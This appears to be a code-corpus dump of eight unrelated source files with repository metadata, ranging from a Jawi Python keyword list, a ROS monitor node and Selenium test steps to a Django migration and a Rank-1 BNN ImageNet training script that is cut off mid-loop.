Lib/keyword.py
|
jiaminglimjm/JawiPython
|
affbb34c7876498a7cc3eef2ef87d59f7cccd8b1
|
[
"0BSD"
] | null | null | null |
"""Keywords (from "Grammar/python.gram")
This file is automatically generated; please don't muck it up!
To update the symbols in this file, 'cd' to the top directory of
the python source tree and run:
PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen \
Grammar/python.gram \
Grammar/Tokens \
Lib/keyword.py
Alternatively, you can run 'make regen-keyword'.
"""
__all__ = ["iskeyword", "issoftkeyword", "kwlist", "softkwlist"]
kwlist = [
'Benar',
'False',
'None',
'Palsu',
'Tiada',
'True',
'akhirnya',
'and',
'as',
'assert',
'async',
'atau',
'await',
'break',
'bukan',
'class',
'continue',
'cuba',
'dalam',
'dan',
'dari',
'def',
'del',
'dengan',
'elif',
'else',
'except',
'finally',
'for',
'from',
'fungsi',
'global',
'hapus',
'ialah',
'if',
'import',
'in',
'is',
'jika',
'jikain',
'kecuali',
'kelas',
'kembali',
'ketika',
'lain',
'lambda',
'lanjut',
'nonlocal',
'not',
'or',
'pass',
'putus',
'raise',
'return',
'sebagai',
'try',
'untuk',
'while',
'with',
'yield',
'اتاو',
'اخيرڽ',
'اونتوق',
'اياله',
'بنر',
'بوکن',
'تياد',
'جک',
'جکاءين',
'دالم',
'دان',
'دري',
'دڠن',
'سباݢاي',
'فوڠسي',
'لاءين',
'لنجوت',
'هاڤوس',
'چوبا',
'ڤلسو',
'ڤوتوس',
'کتيک',
'کلس',
'کمبالي',
'کچوالي'
]
softkwlist = [
'_',
'case',
'match'
]
iskeyword = frozenset(kwlist).__contains__
issoftkeyword = frozenset(softkwlist).__contains__
| 14.938596
| 64
| 0.48855
|
4a18de3bf9ad1220dbfa93016996c8562e2a16ae
| 4,612
|
py
|
Python
|
monitor/src/radiation_monitor_red.py
|
autonomy-and-verification-uol/ROSMonitoring
|
01256f780b4e3ec6f0520d7571558dfa01b8fd91
|
[
"MIT",
"BSD-3-Clause"
] | 11
|
2020-02-18T18:51:01.000Z
|
2022-03-16T12:18:51.000Z
|
monitor/src/radiation_monitor_red.py
|
autonomy-and-verification-uol/ROSMonitoring
|
01256f780b4e3ec6f0520d7571558dfa01b8fd91
|
[
"MIT",
"BSD-3-Clause"
] | 6
|
2020-02-03T15:34:49.000Z
|
2020-02-05T15:58:37.000Z
|
monitor/src/radiation_monitor_red.py
|
autonomy-and-verification-uol/ROSMonitoring
|
01256f780b4e3ec6f0520d7571558dfa01b8fd91
|
[
"MIT",
"BSD-3-Clause"
] | 2
|
2021-10-06T13:37:47.000Z
|
2022-03-24T16:27:15.000Z
|
#!/usr/bin/env python
import rospy
import sys
import json
import yaml
import websocket
from threading import *
from rospy_message_converter import message_converter
from monitor.msg import *
from std_msgs.msg import String
ws_lock = Lock()
dict_msgs = {}
from gazebo_radiation_plugins.msg import Simulated_Radiation_Msg
def callback_radiation_sensor_plugin_sensor_0(data):
global ws, ws_lock
rospy.loginfo('monitor has observed: ' + str(data))
    msg = message_converter.convert_ros_message_to_dictionary(data)
    msg['topic'] = '/radiation_sensor_plugin/sensor_0'
    msg['time'] = rospy.get_time()
    ws_lock.acquire()
    while msg['time'] in dict_msgs:
        msg['time'] += 0.01
    ws.send(json.dumps(msg))
    dict_msgs[msg['time']] = data
ws_lock.release()
rospy.loginfo('event propagated to oracle')
pub_dict = {
}
msg_dict = {
'/radiation_sensor_plugin/sensor_0' : "gazebo_radiation_plugins/Simulated_Radiation_Msg"
}
def monitor():
global pub_error, pub_verdict
with open(log, 'w') as log_file:
log_file.write('')
rospy.init_node('radiation_monitor_red', anonymous=True)
pub_error = rospy.Publisher(name = 'radiation_monitor_red/monitor_error', data_class = MonitorError, latch = True, queue_size = 1000)
pub_verdict = rospy.Publisher(name = 'radiation_monitor_red/monitor_verdict', data_class = String, latch = True, queue_size = 1000)
rospy.Subscriber('/radiation_sensor_plugin/sensor_0', Simulated_Radiation_Msg, callback_radiation_sensor_plugin_sensor_0)
rospy.loginfo('monitor started and ready')
def on_message(ws, message):
global error, log, actions
json_dict = json.loads(message)
if json_dict['verdict'] == 'true' or json_dict['verdict'] == 'currently_true' or json_dict['verdict'] == 'unknown' or (json_dict['verdict'] == 'currently_false' and actions[json_dict['topic']][1] > 1):
if json_dict['verdict'] == 'true' and not pub_dict:
rospy.loginfo('The monitor concluded the satisfaction of the property under analysis, and can be safely removed.')
ws.close()
exit(0)
else:
logging(json_dict)
topic = json_dict['topic']
rospy.loginfo('The event ' + message + ' is consistent and republished')
if topic in pub_dict:
pub_dict[topic].publish(dict_msgs[json_dict['time']])
del dict_msgs[json_dict['time']]
else:
logging(json_dict)
# if (json_dict['verdict'] == 'false' and actions[json_dict['topic']][1] >= 1) or (json_dict['verdict'] == 'currently_false' and actions[json_dict['topic']][1] == 1):
rospy.loginfo('The event ' + message + ' is inconsistent..')
error = MonitorError()
error.topic = json_dict['topic']
error.time = json_dict['time']
error.property = json_dict['spec']
error.content = str(dict_msgs[json_dict['time']])
pub_error.publish(error)
if json_dict['verdict'] == 'false' and not pub_dict:
rospy.loginfo('The monitor concluded the violation of the property under analysis, and can be safely removed.')
ws.close()
exit(0)
if actions[json_dict['topic']][0] != 'filter':
# if json_dict['verdict'] == 'currently_false':
# rospy.loginfo('The event ' + message + ' is consistent ')
topic = json_dict['topic']
if topic in pub_dict:
pub_dict[topic].publish(dict_msgs[json_dict['time']])
del dict_msgs[json_dict['time']]
error = True
pub_verdict.publish(json_dict['verdict'])
def on_error(ws, error):
rospy.loginfo(error)
def on_close(ws):
rospy.loginfo('### websocket closed ###')
def on_open(ws):
rospy.loginfo('### websocket is open ###')
def logging(json_dict):
try:
with open(log, 'a+') as log_file:
log_file.write(json.dumps(json_dict) + '\n')
rospy.loginfo('event logged')
except:
rospy.loginfo('Unable to log the event.')
def main(argv):
global log, actions, ws
log = '/media/angelo/WorkData/git/radiation_ws/src/monitor/log_radiation_red.txt'
actions = {
'/radiation_sensor_plugin/sensor_0' : ('log', 1)
}
monitor()
websocket.enableTrace(False)
ws = websocket.WebSocketApp(
'ws://127.0.0.1:8081',
on_message = on_message,
on_error = on_error,
on_close = on_close,
on_open = on_open)
ws.run_forever()
if __name__ == '__main__':
main(sys.argv)
| 37.803279
| 205
| 0.645924
|
4a18df85db89a74d3a14478fc1fd46600e185ad1
| 75
|
py
|
Python
|
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
from concurrent.futures import Future
print(Future)
print('Successful.')
| 12.5
| 37
| 0.786667
|
4a18df88f9eb8e6d5ea2048117a038ecb972baee
| 1,016
|
py
|
Python
|
Algorithms/Strings/hackerrank_in_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
Algorithms/Strings/hackerrank_in_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
Algorithms/Strings/hackerrank_in_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
q = int(input().strip())
for a0 in range(q):
    s = input().strip()
    # Greedy subsequence check: look for each letter of 'hackerrank' in order,
    # resuming the search just past the previous match.
    start = -1
    for ch in 'hackerrank':
        start = s.find(ch, start + 1)
        if start == -1:
            print('NO')
            break
    else:
        print('YES')
| 20.734694
| 32
| 0.458661
|
4a18df909a756ccdcbdef7a31b87f6742bf91c6f
| 868
|
py
|
Python
|
BDD_Formy_testing/src/features/steps/modal_page_steps.py
|
AntonioIonica/Automation_testing
|
6f7c94c55677b0958e6fada24058f1a00d2c0d0e
|
[
"MIT"
] | null | null | null |
BDD_Formy_testing/src/features/steps/modal_page_steps.py
|
AntonioIonica/Automation_testing
|
6f7c94c55677b0958e6fada24058f1a00d2c0d0e
|
[
"MIT"
] | null | null | null |
BDD_Formy_testing/src/features/steps/modal_page_steps.py
|
AntonioIonica/Automation_testing
|
6f7c94c55677b0958e6fada24058f1a00d2c0d0e
|
[
"MIT"
] | null | null | null |
import time
from behave import *
from selenium.webdriver.common.by import By
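# behave dispatches on each decorator's step text, so reusing the function name
# step_impl for every step definition is the framework's usual convention.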
@when(u'I navigate to modal page')
def step_impl(context):
context.driver.find_element(By.XPATH, '/html/body/div/div/li[10]/a').click()
time.sleep(1.5)
@when(u'I click on "Open Modal"')
def step_impl(context):
context.driver.find_element(By.ID, 'modal-button').click()
time.sleep(1.5)
@when(u'I click on ok button')
def step_impl(context):
context.driver.find_element(By.ID, 'ok-button').click()
@then(u'The modal window closes')
def step_impl(context):
modal_title = context.driver.find_element(By.XPATH, '//*[@id="exampleModal"]/div/div')
if modal_title.is_displayed() is False:
assert True
else:
assert False
@when(u'I click on close button')
def step_impl(context):
context.driver.find_element(By.ID, 'close-button').click()
| 24.8
| 90
| 0.697005
|
4a18dfd4101442937cca25c0a1d52fdaad1af669
| 720
|
py
|
Python
|
useful_scripts/scaleToWidthxWidth.py
|
jessvb/3d_world_procedural_generation
|
44468f4267ccb378de90efb53d6c52a204cd6e25
|
[
"MIT"
] | 7
|
2019-01-29T21:20:01.000Z
|
2020-11-23T01:03:04.000Z
|
useful_scripts/scaleToWidthxWidth.py
|
jessvb/3d_world_procedural_generation
|
44468f4267ccb378de90efb53d6c52a204cd6e25
|
[
"MIT"
] | null | null | null |
useful_scripts/scaleToWidthxWidth.py
|
jessvb/3d_world_procedural_generation
|
44468f4267ccb378de90efb53d6c52a204cd6e25
|
[
"MIT"
] | 1
|
2021-07-12T10:43:29.000Z
|
2021-07-12T10:43:29.000Z
|
############################################################
###### Run this script within the source image folder ######
############################################################
import PIL
import glob
from PIL import Image
imgList = glob.glob('*.png')
fileOutputPath = 'C:/Users/jessv/Dropbox (MIT)/1st Year EECS/6.S198/6.S198 Final Project/Test PIL/ResizedImg/'
basewidth = 1024
for imgName in imgList:
img = Image.open(imgName)
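    # Scale the height by the same factor as the width to preserve the aspect ratio.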
wpercent = (basewidth / float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
img = img.resize((basewidth, hsize), PIL.Image.ANTIALIAS)
img.save(fileOutputPath + str(basewidth) + imgName)
print('done resizing ' + imgName)
print('done!')
| 30
| 110
| 0.569444
|
4a18e00d8bc3c6f27e943b7ff65831f134118697
| 918
|
py
|
Python
|
main/migrations/0004_auto_20190801_1128.py
|
NuTTeR/routersite-web
|
340595ccb129fd91233b847695c8d72c29d77e00
|
[
"MIT"
] | null | null | null |
main/migrations/0004_auto_20190801_1128.py
|
NuTTeR/routersite-web
|
340595ccb129fd91233b847695c8d72c29d77e00
|
[
"MIT"
] | 4
|
2021-04-08T21:55:02.000Z
|
2021-06-10T20:28:22.000Z
|
main/migrations/0004_auto_20190801_1128.py
|
NuTTeR/routersite-web
|
340595ccb129fd91233b847695c8d72c29d77e00
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.3 on 2019-08-01 11:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_routeinitauto_driver_limit'),
]
operations = [
migrations.AddField(
model_name='route',
name='load_time',
field=models.PositiveIntegerField(default=0, verbose_name='Время погрузки (в секундах)'),
preserve_default=False,
),
migrations.AlterField(
model_name='route',
name='reis_start',
field=models.PositiveIntegerField(verbose_name='Приезд на погрузку (в секундах с полуночи)'),
),
migrations.AlterField(
model_name='routeinitauto',
name='reis_start',
field=models.PositiveIntegerField(verbose_name='Время начала работы водителя (в секундах с полуночи)'),
),
]
| 30.6
| 115
| 0.617647
|
4a18e0830194616bcb147114d72c0a307257e565
| 22,984
|
py
|
Python
|
baselines/imagenet/het_rank1_bnn.py
|
dvdzhang/uncertainty-baselines
|
8ce0d7494e5cae0719c1b750da4b61564e536636
|
[
"Apache-2.0"
] | null | null | null |
baselines/imagenet/het_rank1_bnn.py
|
dvdzhang/uncertainty-baselines
|
8ce0d7494e5cae0719c1b750da4b61564e536636
|
[
"Apache-2.0"
] | null | null | null |
baselines/imagenet/het_rank1_bnn.py
|
dvdzhang/uncertainty-baselines
|
8ce0d7494e5cae0719c1b750da4b61564e536636
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rank-1 BNN ResNet-50 on ImageNet with an heteroscedastic output layer.
An heteroscedastic output layer [1] uses a multivariate Normal distributed
latent variable on the final hidden layer. The covariance matrix of this latent
variable, models the aleatoric uncertainty due to label noise.
A Rank-1 Bayesian neural net (Rank-1 BNN) [2] is an efficient and scalable
approach to variational BNNs that posits prior distributions on rank-1 factors
of the weights and optimizes global mixture variational posterior distributions.
The approaches are combined simply by using DenseRank1 layers from [2] to
construct the heteroscedastic layer.
References:
[1]: Mark Collier, Basil Mustafa, Efi Kokiopoulou, Rodolphe Jenatton and
Jesse Berent. Correlated Input-Dependent Label Noise in Large-Scale Image
Classification. In Proc. of the IEEE/CVF Conference on Computer Vision
and Pattern Recognition (CVPR), 2021, pp. 1551-1560.
https://arxiv.org/abs/2105.10305
[2]: Michael W. Dusenberry*, Ghassen Jerfel*, Yeming Wen, Yian Ma, Jasper
Snoek, Katherine Heller, Balaji Lakshminarayanan, Dustin Tran. Efficient
and Scalable Bayesian Neural Nets with Rank-1 Factors. In Proc. of
International Conference on Machine Learning (ICML) 2020.
https://arxiv.org/abs/2005.07186
"""
import os
import time
from absl import app
from absl import flags
from absl import logging
import robustness_metrics as rm
import tensorflow as tf
import tensorflow_datasets as tfds
import uncertainty_baselines as ub
import utils # local file import from baselines.imagenet
from tensorboard.plugins.hparams import api as hp
flags.DEFINE_integer('kl_annealing_epochs', 90,
'Number of epochs over which to anneal the KL term to 1.')
flags.DEFINE_string('alpha_initializer', 'trainable_normal',
'Initializer name for the alpha parameters.')
flags.DEFINE_string('gamma_initializer', 'trainable_normal',
'Initializer name for the gamma parameters.')
flags.DEFINE_string('alpha_regularizer', 'normal_kl_divergence',
'Regularizer name for the alpha parameters.')
flags.DEFINE_string('gamma_regularizer', 'normal_kl_divergence',
'Regularizer name for the gamma parameters.')
flags.DEFINE_boolean('use_additive_perturbation', False,
'Use additive perturbations instead of multiplicative.')
# General model flags
flags.DEFINE_integer('ensemble_size', 4, 'Size of ensemble.')
flags.DEFINE_integer('per_core_batch_size', 128, 'Batch size per TPU core/GPU.')
flags.DEFINE_float('random_sign_init', 0.75,
'Use random sign init for fast weights.')
flags.DEFINE_integer('seed', 0, 'Random seed.')
flags.DEFINE_float('base_learning_rate', 0.1,
'Base learning rate when train batch size is 256.')
flags.DEFINE_float('one_minus_momentum', 0.1, 'Optimizer momentum.')
flags.DEFINE_float('dropout_rate', 1e-3,
'Dropout rate. Only used if alpha/gamma initializers are, '
'e.g., trainable normal with a fixed stddev.')
flags.DEFINE_float('prior_stddev', 0.05,
'Prior stddev. Sort of like a prior on dropout rate, where '
'it encourages defaulting/shrinking to this value.')
flags.DEFINE_float('l2', 1e-4, 'L2 coefficient.')
flags.DEFINE_float('fast_weight_lr_multiplier', 1.0,
'fast weights lr multiplier.')
flags.DEFINE_string('data_dir', None, 'Path to training and testing data.')
flags.DEFINE_string('output_dir', '/tmp/imagenet',
'The directory where the model weights and '
'training/evaluation summaries are stored.')
flags.DEFINE_integer('train_epochs', 135, 'Number of training epochs.')
flags.DEFINE_integer('corruptions_interval', 135,
'Number of epochs between evaluating on the corrupted '
'test data. Use -1 to never evaluate.')
flags.DEFINE_integer('checkpoint_interval', 27,
'Number of epochs between saving checkpoints. Use -1 to '
'never save checkpoints.')
flags.DEFINE_string('alexnet_errors_path', None,
'Path to AlexNet corruption errors file.')
flags.DEFINE_integer('num_bins', 15, 'Number of bins for ECE computation.')
flags.DEFINE_bool('use_ensemble_bn', False, 'Whether to use ensemble bn.')
flags.DEFINE_integer('num_eval_samples', 1,
'Number of model predictions to sample per example at '
'eval time.')
# Accelerator flags.
flags.DEFINE_bool('use_gpu', False, 'Whether to run on GPU or otherwise TPU.')
flags.DEFINE_bool('use_bfloat16', False, 'Whether to use mixed precision.')
flags.DEFINE_integer('num_cores', 32, 'Number of TPU cores or number of GPUs.')
flags.DEFINE_string('tpu', None,
'Name of the TPU. Only used if use_gpu is False.')
# Heteroscedastic flags.
flags.DEFINE_integer('num_factors', 15,
'Num factors to approximate full rank covariance matrix.')
flags.DEFINE_float('temperature', 1.5,
'Temperature for heteroscedastic head.')
flags.DEFINE_integer('num_mc_samples', 5000,
'Num MC samples for heteroscedastic layer.')
FLAGS = flags.FLAGS
# Number of images in ImageNet-1k train dataset.
APPROX_IMAGENET_TRAIN_IMAGES = 1281167
# Number of images in eval dataset.
IMAGENET_VALIDATION_IMAGES = 50000
NUM_CLASSES = 1000
def main(argv):
del argv # unused arg
tf.random.set_seed(FLAGS.seed)
per_core_batch_size = FLAGS.per_core_batch_size // FLAGS.ensemble_size
batch_size = per_core_batch_size * FLAGS.num_cores
steps_per_epoch = APPROX_IMAGENET_TRAIN_IMAGES // batch_size
steps_per_eval = IMAGENET_VALIDATION_IMAGES // batch_size
logging.info('Saving checkpoints at %s', FLAGS.output_dir)
data_dir = FLAGS.data_dir
if FLAGS.use_gpu:
logging.info('Use GPU')
strategy = tf.distribute.MirroredStrategy()
else:
logging.info('Use TPU at %s',
FLAGS.tpu if FLAGS.tpu is not None else 'local')
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=FLAGS.tpu)
tf.config.experimental_connect_to_cluster(resolver)
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.TPUStrategy(resolver)
train_builder = ub.datasets.ImageNetDataset(
split=tfds.Split.TRAIN,
use_bfloat16=FLAGS.use_bfloat16,
data_dir=data_dir)
train_dataset = train_builder.load(batch_size=batch_size, strategy=strategy)
test_builder = ub.datasets.ImageNetDataset(
split=tfds.Split.TEST, use_bfloat16=FLAGS.use_bfloat16, data_dir=data_dir)
clean_test_dataset = test_builder.load(
batch_size=batch_size, strategy=strategy)
test_datasets = {
'clean': clean_test_dataset
}
if FLAGS.corruptions_interval > 0:
corruption_types, max_intensity = utils.load_corrupted_test_info()
for name in corruption_types:
for intensity in range(1, max_intensity + 1):
dataset_name = '{0}_{1}'.format(name, intensity)
dataset = utils.load_corrupted_test_dataset(
batch_size=batch_size,
corruption_name=name,
corruption_intensity=intensity,
use_bfloat16=FLAGS.use_bfloat16)
test_datasets[dataset_name] = (
strategy.experimental_distribute_dataset(dataset))
if FLAGS.use_bfloat16:
policy = tf.keras.mixed_precision.experimental.Policy('mixed_bfloat16')
tf.keras.mixed_precision.experimental.set_policy(policy)
summary_writer = tf.summary.create_file_writer(
os.path.join(FLAGS.output_dir, 'summaries'))
with strategy.scope():
logging.info('Building Keras ResNet-50 model')
model = ub.models.resnet50_het_rank1(
input_shape=(224, 224, 3),
num_classes=NUM_CLASSES,
alpha_initializer=FLAGS.alpha_initializer,
gamma_initializer=FLAGS.gamma_initializer,
alpha_regularizer=FLAGS.alpha_regularizer,
gamma_regularizer=FLAGS.gamma_regularizer,
use_additive_perturbation=FLAGS.use_additive_perturbation,
ensemble_size=FLAGS.ensemble_size,
random_sign_init=FLAGS.random_sign_init,
dropout_rate=FLAGS.dropout_rate,
prior_stddev=FLAGS.prior_stddev,
use_tpu=not FLAGS.use_gpu,
use_ensemble_bn=FLAGS.use_ensemble_bn,
num_factors=FLAGS.num_factors,
temperature=FLAGS.temperature,
num_mc_samples=FLAGS.num_mc_samples)
logging.info('Model input shape: %s', model.input_shape)
logging.info('Model output shape: %s', model.output_shape)
logging.info('Model number of weights: %s', model.count_params())
# Scale learning rate and decay epochs by vanilla settings.
base_lr = FLAGS.base_learning_rate * batch_size / 256
decay_epochs = [
(FLAGS.train_epochs * 30) // 90,
(FLAGS.train_epochs * 60) // 90,
(FLAGS.train_epochs * 80) // 90,
]
learning_rate = ub.schedules.WarmUpPiecewiseConstantSchedule(
steps_per_epoch=steps_per_epoch,
base_learning_rate=base_lr,
decay_ratio=0.1,
decay_epochs=decay_epochs,
warmup_epochs=5)
optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate,
momentum=1.0 - FLAGS.one_minus_momentum,
nesterov=True)
metrics = {
'train/negative_log_likelihood': tf.keras.metrics.Mean(),
'train/kl': tf.keras.metrics.Mean(),
'train/kl_scale': tf.keras.metrics.Mean(),
'train/elbo': tf.keras.metrics.Mean(),
'train/loss': tf.keras.metrics.Mean(),
'train/accuracy': tf.keras.metrics.SparseCategoricalAccuracy(),
'train/ece': rm.metrics.ExpectedCalibrationError(
num_bins=FLAGS.num_bins),
'train/diversity': rm.metrics.AveragePairwiseDiversity(),
'test/negative_log_likelihood': tf.keras.metrics.Mean(),
'test/kl': tf.keras.metrics.Mean(),
'test/elbo': tf.keras.metrics.Mean(),
'test/accuracy': tf.keras.metrics.SparseCategoricalAccuracy(),
'test/ece': rm.metrics.ExpectedCalibrationError(
num_bins=FLAGS.num_bins),
'test/diversity': rm.metrics.AveragePairwiseDiversity(),
'test/member_accuracy_mean': (
tf.keras.metrics.SparseCategoricalAccuracy()),
'test/member_ece_mean': rm.metrics.ExpectedCalibrationError(
num_bins=FLAGS.num_bins),
}
if FLAGS.corruptions_interval > 0:
corrupt_metrics = {}
for intensity in range(1, max_intensity + 1):
for corruption in corruption_types:
dataset_name = '{0}_{1}'.format(corruption, intensity)
corrupt_metrics['test/nll_{}'.format(dataset_name)] = (
tf.keras.metrics.Mean())
corrupt_metrics['test/kl_{}'.format(dataset_name)] = (
tf.keras.metrics.Mean())
corrupt_metrics['test/elbo_{}'.format(dataset_name)] = (
tf.keras.metrics.Mean())
corrupt_metrics['test/accuracy_{}'.format(dataset_name)] = (
tf.keras.metrics.SparseCategoricalAccuracy())
corrupt_metrics['test/ece_{}'.format(dataset_name)] = (
rm.metrics.ExpectedCalibrationError(num_bins=FLAGS.num_bins))
if FLAGS.ensemble_size > 1:
for i in range(FLAGS.ensemble_size):
metrics['test/nll_member_{}'.format(i)] = tf.keras.metrics.Mean()
metrics['test/accuracy_member_{}'.format(i)] = (
tf.keras.metrics.SparseCategoricalAccuracy())
logging.info('Finished building Keras ResNet-50 model')
checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)
latest_checkpoint = tf.train.latest_checkpoint(FLAGS.output_dir)
initial_epoch = 0
if latest_checkpoint:
# checkpoint.restore must be within a strategy.scope() so that optimizer
# slot variables are mirrored.
checkpoint.restore(latest_checkpoint)
logging.info('Loaded checkpoint %s', latest_checkpoint)
initial_epoch = optimizer.iterations.numpy() // steps_per_epoch
def compute_l2_loss(model):
filtered_variables = []
for var in model.trainable_variables:
# Apply l2 on the BN parameters and bias terms. This
# excludes only fast weight approximate posterior/prior parameters,
# but pay caution to their naming scheme.
if ('kernel' in var.name or
'batch_norm' in var.name or
'bias' in var.name):
filtered_variables.append(tf.reshape(var, (-1,)))
l2_loss = FLAGS.l2 * 2 * tf.nn.l2_loss(
tf.concat(filtered_variables, axis=0))
return l2_loss
@tf.function
def train_step(iterator):
"""Training StepFn."""
def step_fn(inputs):
"""Per-Replica StepFn."""
images = inputs['features']
labels = inputs['labels']
if FLAGS.ensemble_size > 1:
images = tf.tile(images, [FLAGS.ensemble_size, 1, 1, 1])
labels = tf.tile(labels, [FLAGS.ensemble_size])
with tf.GradientTape() as tape:
logits = model(images, training=True)
if FLAGS.use_bfloat16:
logits = tf.cast(logits, tf.float32)
probs = tf.nn.softmax(logits)
if FLAGS.ensemble_size > 1:
per_probs = tf.reshape(
probs, tf.concat([[FLAGS.ensemble_size, -1], probs.shape[1:]], 0))
metrics['train/diversity'].add_batch(per_probs)
negative_log_likelihood = tf.reduce_mean(
tf.keras.losses.sparse_categorical_crossentropy(labels,
logits,
from_logits=True))
l2_loss = compute_l2_loss(model)
kl = sum(model.losses) / APPROX_IMAGENET_TRAIN_IMAGES
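        # Anneal the KL weight linearly from ~0 to 1 over kl_annealing_epochs so
        # the prior term does not dominate the likelihood early in training.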
kl_scale = tf.cast(optimizer.iterations + 1, kl.dtype)
kl_scale /= steps_per_epoch * FLAGS.kl_annealing_epochs
kl_scale = tf.minimum(1., kl_scale)
kl_loss = kl_scale * kl
# Scale the loss given the TPUStrategy will reduce sum all gradients.
loss = negative_log_likelihood + l2_loss + kl_loss
scaled_loss = loss / strategy.num_replicas_in_sync
elbo = -(negative_log_likelihood + l2_loss + kl)
grads = tape.gradient(scaled_loss, model.trainable_variables)
# Separate learning rate implementation.
if FLAGS.fast_weight_lr_multiplier != 1.0:
grads_and_vars = []
for grad, var in zip(grads, model.trainable_variables):
# Apply different learning rate on the fast weights. This excludes BN
# and slow weights, but pay caution to the naming scheme.
if ('batch_norm' not in var.name and 'kernel' not in var.name):
grads_and_vars.append((grad * FLAGS.fast_weight_lr_multiplier,
var))
else:
grads_and_vars.append((grad, var))
optimizer.apply_gradients(grads_and_vars)
else:
optimizer.apply_gradients(zip(grads, model.trainable_variables))
metrics['train/negative_log_likelihood'].update_state(
negative_log_likelihood)
metrics['train/kl'].update_state(kl)
metrics['train/kl_scale'].update_state(kl_scale)
metrics['train/elbo'].update_state(elbo)
metrics['train/loss'].update_state(loss)
metrics['train/accuracy'].update_state(labels, logits)
metrics['train/ece'].add_batch(probs, label=labels)
for _ in tf.range(tf.cast(steps_per_epoch, tf.int32)):
strategy.run(step_fn, args=(next(iterator),))
@tf.function
def test_step(iterator, dataset_name):
"""Evaluation StepFn."""
def step_fn(inputs):
"""Per-Replica StepFn."""
images = inputs['features']
labels = inputs['labels']
if FLAGS.ensemble_size > 1:
images = tf.tile(images, [FLAGS.ensemble_size, 1, 1, 1])
logits = tf.reshape(
[model(images, training=False)
for _ in range(FLAGS.num_eval_samples)],
[FLAGS.num_eval_samples, FLAGS.ensemble_size, -1, NUM_CLASSES])
if FLAGS.use_bfloat16:
logits = tf.cast(logits, tf.float32)
all_probs = tf.nn.softmax(logits)
probs = tf.math.reduce_mean(all_probs, axis=[0, 1]) # marginalize
# Negative log marginal likelihood computed in a numerically-stable way.
labels_broadcasted = tf.broadcast_to(
labels,
[FLAGS.num_eval_samples, FLAGS.ensemble_size, tf.shape(labels)[0]])
log_likelihoods = -tf.keras.losses.sparse_categorical_crossentropy(
labels_broadcasted, logits, from_logits=True)
negative_log_likelihood = tf.reduce_mean(
-tf.reduce_logsumexp(log_likelihoods, axis=[0, 1]) +
tf.math.log(float(FLAGS.num_eval_samples * FLAGS.ensemble_size)))
l2_loss = compute_l2_loss(model)
kl = sum(model.losses) / IMAGENET_VALIDATION_IMAGES
elbo = -(negative_log_likelihood + l2_loss + kl)
if dataset_name == 'clean':
if FLAGS.ensemble_size > 1:
per_probs = tf.reduce_mean(all_probs, axis=0) # marginalize samples
metrics['test/diversity'].add_batch(per_probs)
for i in range(FLAGS.ensemble_size):
member_probs = per_probs[i]
member_loss = tf.keras.losses.sparse_categorical_crossentropy(
labels, member_probs)
metrics['test/nll_member_{}'.format(i)].update_state(member_loss)
metrics['test/accuracy_member_{}'.format(i)].update_state(
labels, member_probs)
metrics['test/member_accuracy_mean'].update_state(
labels, member_probs)
metrics['test/member_ece_mean'].add_batch(
member_probs, label=labels)
metrics['test/negative_log_likelihood'].update_state(
negative_log_likelihood)
metrics['test/kl'].update_state(kl)
metrics['test/elbo'].update_state(elbo)
metrics['test/accuracy'].update_state(labels, probs)
metrics['test/ece'].add_batch(probs, label=labels)
else:
corrupt_metrics['test/nll_{}'.format(dataset_name)].update_state(
negative_log_likelihood)
corrupt_metrics['test/kl_{}'.format(dataset_name)].update_state(kl)
corrupt_metrics['test/elbo_{}'.format(dataset_name)].update_state(elbo)
corrupt_metrics['test/accuracy_{}'.format(dataset_name)].update_state(
labels, probs)
corrupt_metrics['test/ece_{}'.format(dataset_name)].add_batch(
probs, label=labels)
for _ in tf.range(tf.cast(steps_per_eval, tf.int32)):
strategy.run(step_fn, args=(next(iterator),))
train_iterator = iter(train_dataset)
start_time = time.time()
for epoch in range(initial_epoch, FLAGS.train_epochs):
logging.info('Starting to run epoch: %s', epoch)
train_step(train_iterator)
current_step = (epoch + 1) * steps_per_epoch
max_steps = steps_per_epoch * FLAGS.train_epochs
time_elapsed = time.time() - start_time
steps_per_sec = float(current_step) / time_elapsed
eta_seconds = (max_steps - current_step) / steps_per_sec
message = ('{:.1%} completion: epoch {:d}/{:d}. {:.1f} steps/s. '
'ETA: {:.0f} min. Time elapsed: {:.0f} min'.format(
current_step / max_steps,
epoch + 1,
FLAGS.train_epochs,
steps_per_sec,
eta_seconds / 60,
time_elapsed / 60))
logging.info(message)
datasets_to_evaluate = {'clean': test_datasets['clean']}
if (FLAGS.corruptions_interval > 0 and
(epoch + 1) % FLAGS.corruptions_interval == 0):
datasets_to_evaluate = test_datasets
for dataset_name, test_dataset in datasets_to_evaluate.items():
